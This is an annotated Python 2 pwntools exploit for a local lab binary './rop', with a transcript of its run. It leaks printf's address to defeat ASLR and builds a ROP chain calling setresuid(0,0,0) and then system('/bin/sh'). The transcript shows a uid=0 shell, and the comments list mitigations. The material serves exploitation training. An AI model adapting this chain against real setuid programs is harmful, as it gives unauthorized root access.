...
# Lab exploit for the local training binary ./rop (run from this directory).
# The target prints the runtime address of printf, which is used to compute
# the libc base and build a ROP chain; this is the standard illustration of
# why a single leaked pointer defeats ASLR. The script is written for
# Python 2 pwntools: a str payload is concatenated with p64() output, which
# would be a str/bytes TypeError on Python 3 (there "A"*72 would need to be bytes).
from pwn import *
from struct import *  # not used below; only pwntools' p64 is needed

#context.log_level = 'debug'

# Offsets are tied to the libc build named in the author's comment; on any
# other libc build they would have to be recomputed.
#64bit OS - /lib/x86_64-linux-gnu/libc-2.23.so
libcbase_printf_offset = 0x55800
libcbase_system_offset = 0x45390
libcbase_setresuid_offset = 0xcd570
binsh_offset = 0x18cd57          # libc-relative: added to libcbase below

# Absolute addresses (never added to libcbase), presumably gadgets inside
# the ./rop binary itself. pop_rsi_ret is defined but not used in the chain.
pop_rdi_ret = 0x400843
pop_rsi_ret = 0x400841
pop_rdx_ret_offset = 0x1150c9    # libc-relative, unlike the two above

r = process('./rop')
r.recvn(10)                      # discard the first 10 bytes of output
r.recvuntil('Printf() address : ')
libcbase = int(r.recvuntil('\n'),16)   # leaked printf address, parsed as hex
libcbase -= libcbase_printf_offset     # leak - offset = libc base for this build

# 72 bytes of padding precede the first gadget address; presumably the
# distance from the overflowed buffer to the saved return address — confirm
# against the binary's stack layout.
payload = "A"*72
# setresuid(0, 0, 0): rdi <- 0, then two zeros follow the rdx gadget, so that
# gadget presumably pops two registers (rdx and rsi) — verify against the
# gadget at libcbase + pop_rdx_ret_offset.
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(libcbase + pop_rdx_ret_offset)
payload += p64(0)
payload += p64(0)
payload += p64(libcbase + libcbase_setresuid_offset)
# system("/bin/sh"): rdi <- address of the "/bin/sh" string inside libc.
payload += p64(pop_rdi_ret)
payload += p64(libcbase + binsh_offset)
payload += p64(libcbase + libcbase_system_offset)

r.send(payload)
# The uid=0 shell in the transcript below implies the lab binary runs with
# elevated privileges; that is not visible from this script. Mitigations that
# break this chain: not printing addresses, stack canaries / bounds checks on
# the overflowed buffer, and PIE so the gadget addresses are not fixed.
r.interactive()
lazenca0x0@ubuntu:~/Exploit/ROP$ python ropexploit.py
[+] Starting local process './rop': pid 5698
[*] Switching to interactive mode
$ id
uid=0(root) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$